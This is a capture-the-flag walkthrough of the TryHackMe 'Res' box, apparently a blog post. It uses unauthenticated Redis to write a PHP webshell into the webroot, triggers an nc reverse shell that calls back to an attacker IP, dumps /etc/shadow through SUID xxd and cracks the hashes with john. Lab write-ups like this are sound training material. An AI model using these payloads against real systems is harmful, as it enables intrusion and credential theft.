Res Walkthrough — TryHackMe

Anon Tuttu Venus
4 min readOct 13, 2020


Box Name: Res

IP: 10.10.104.100

Reconnaissance

First and foremost, scan all ports on the target.

nmap -A -p- -Pn -oN nmapFULL 10.10.104.100
  • -A: Enable OS detection, version detection, script scanning, and traceroute
  • -Pn : Treat all hosts as online — skip host discovery
  • -p- : Scan all ports(65,535)
  • -oN : Output scan in normal format
[Screenshot: nmap scan output]

Only 2 ports are open: 80 and 6379.

Port 80 serves the Apache default page.

Redis is running on 6379.

Enumeration

I ran dirb and gobuster against the web server but didn't find anything interesting, so the next option is the Redis server on 6379.

To connect to the Redis server we need the Redis client (redis-cli) installed on our machine.

sudo apt-get install redis-tools

We can connect to a Redis server with or without a password. Note that -p is the port (6379 by default); the password goes with -a.

Syntax with password
redis-cli -h $ip_address -a $password
Syntax without password
redis-cli -h $ip_address

In our case, unauthenticated access works: no password is required.

redis-cli -h 10.10.104.100
[Screenshot: connected to Redis, 10.10.104.100:6379> prompt]

Since the Redis prompt alone doesn't give us command execution on the box, we need a reverse shell to move on. After a bit of googling I found a good write-up of Redis RCE: https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#redis-rce.

It actually targets the nginx webroot [ /usr/share/nginx/html ], but this box is running Apache [ /var/www/html ], so the directory passed to CONFIG SET dir has to be changed accordingly.

[Screenshot: test PHP file (trail.php) written through redis-cli]

Now we can check whether the file was written by browsing to http://10.10.104.100/trail.php

[Screenshot: trail.php rendered by Apache]

Now we will write a PHP command-injection payload. You can either overwrite the old trail.php or create a new PHP file; I created a new one named rev.php.

Exploitation

PHP Command Injection Payload

"<?php system($_GET['cmd']); ?>"
[Screenshot: payload set as a Redis key and saved to /var/www/html/rev.php]

Let's access http://10.10.104.100/rev.php?cmd=whoami; the page should answer with www-data, the Apache user.

[Screenshot: output of ?cmd=whoami]

Now we need a reverse shell; I'm using an nc one-liner for that. Start a listener on the attacking machine first (nc -lvnp 1337), then trigger the one-liner through the webshell. The command travels in a GET parameter, so the spaces must be percent-encoded (a browser does this for you; with curl use -G --data-urlencode). If the target's nc lacks the -e option (OpenBSD netcat), fall back to a bash reverse shell instead.

Syntax :
nc -e /bin/bash $attackerIP $attackerPort
Example:
nc -e /bin/bash 10.9.62.7 1337

http://10.10.104.100/rev.php?cmd=nc%20-e%20/bin/bash%2010.9.62.7%201337

Non-Interactive Shell to Interactive Shell:

python -c 'import pty;pty.spawn("/bin/bash")'

Ctrl+Z

stty raw -echo

fg (then press Enter twice)

export TERM=xterm

Privilege Escalation

We can search for programs with SUID permission

find / -perm -u=s -type f 2>/dev/null

The results show the binary xxd with the SUID bit set and owned by root, so it is worth checking for an escalation path. For SUID/sudo privilege escalation GTFOBins is the place to look.

From GTFOBins we find that SUID xxd can read arbitrary files as root, so we read /etc/shadow.

LFILE=/etc/shadow
xxd "$LFILE" | xxd -r
[Screenshot: /etc/shadow contents dumped via xxd]

Copy and Save the content to our machine [ shadow.txt ]

We also need /etc/passwd to crack the password, saved as [ passwd.txt ]; john expects the login and hash on one line, which unshadow produces from the two files.

[Screenshot: /etc/passwd contents]

Brute Forcing the Hash with John:

unshadow passwd.txt shadow.txt > unshadow.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadow.txt
john --show unshadow.txt
[Screenshot: john output with the cracked password for vianka]
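To make clear why both files are needed, here is the merge step that unshadow performs, as an added example in Python rather than the john tooling the post uses. The passwd and shadow lines are constructed for illustration (the hash is a placeholder, not the box's real hash), and the function names are my own. It also shows which entries are worth feeding to john at all: locked accounts (* or !) have nothing to crack, and the $6$ prefix tells you the hash is sha512crypt.

```python
# Constructed sample input; the vianka hash is a placeholder, not a real hash.
PASSWD = """root:x:0:0:root:/root:/bin/bash
vianka:x:1000:1000:vianka,,,:/home/vianka:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""
SHADOW = """root:*:18500:0:99999:7:::
vianka:$6$constructed$NOTAREALHASH00000000000000000000000000000000000000000000000000000000000000000000000:18500:0:99999:7:::
www-data:*:18500:0:99999:7:::
"""

# crypt(3) prefixes john reports as the hash format
HASH_TYPES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}


def unshadow(passwd_text: str, shadow_text: str) -> str:
    """Replace the 'x' in passwd's second field with the hash from shadow,
    producing login:hash:uid:gid:gecos:home:shell like unshadow(8).
    The GECOS/home fields are kept because john's single mode derives
    candidate passwords from them."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line and not line.startswith("#"):
            user, h = line.split(":", 2)[:2]
            hashes[user] = h
    merged = []
    for line in passwd_text.splitlines():
        if not line:
            continue
        f = line.split(":")
        f[1] = hashes.get(f[0], f[1])   # users missing from shadow keep their 'x'
        merged.append(":".join(f))
    return "\n".join(merged) + "\n"


def crackable_users(merged_text: str) -> list:
    """Return (user, hash_type) for entries john can attack.
    Locked (*, !) and empty hash fields carry nothing to crack and are skipped."""
    out = []
    for line in merged_text.splitlines():
        f = line.split(":")
        h = f[1]
        if h.startswith("$"):
            out.append((f[0], HASH_TYPES.get(h[:3], "unknown")))
    return out


if __name__ == "__main__":
    merged = unshadow(PASSWD, SHADOW)
    print(merged, end="")
    print(crackable_users(merged))
```

On the real files this is equivalent to unshadow passwd.txt shadow.txt > unshadow.txt; the point of the second function is that only vianka's line is worth the rockyou run, which is exactly what john's own output reflects.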

Now we can switch user to vianka with the su command.

www-data@ubuntu:/$ su - vianka
vianka@ubuntu:~$ sudo -l
vianka@ubuntu:~$ sudo -i
root@ubuntu:~#

Running 'sudo -l', we can see that vianka has full sudo access. To escalate to root all we need to do is run 'sudo -i'.

Root!

FLAGS
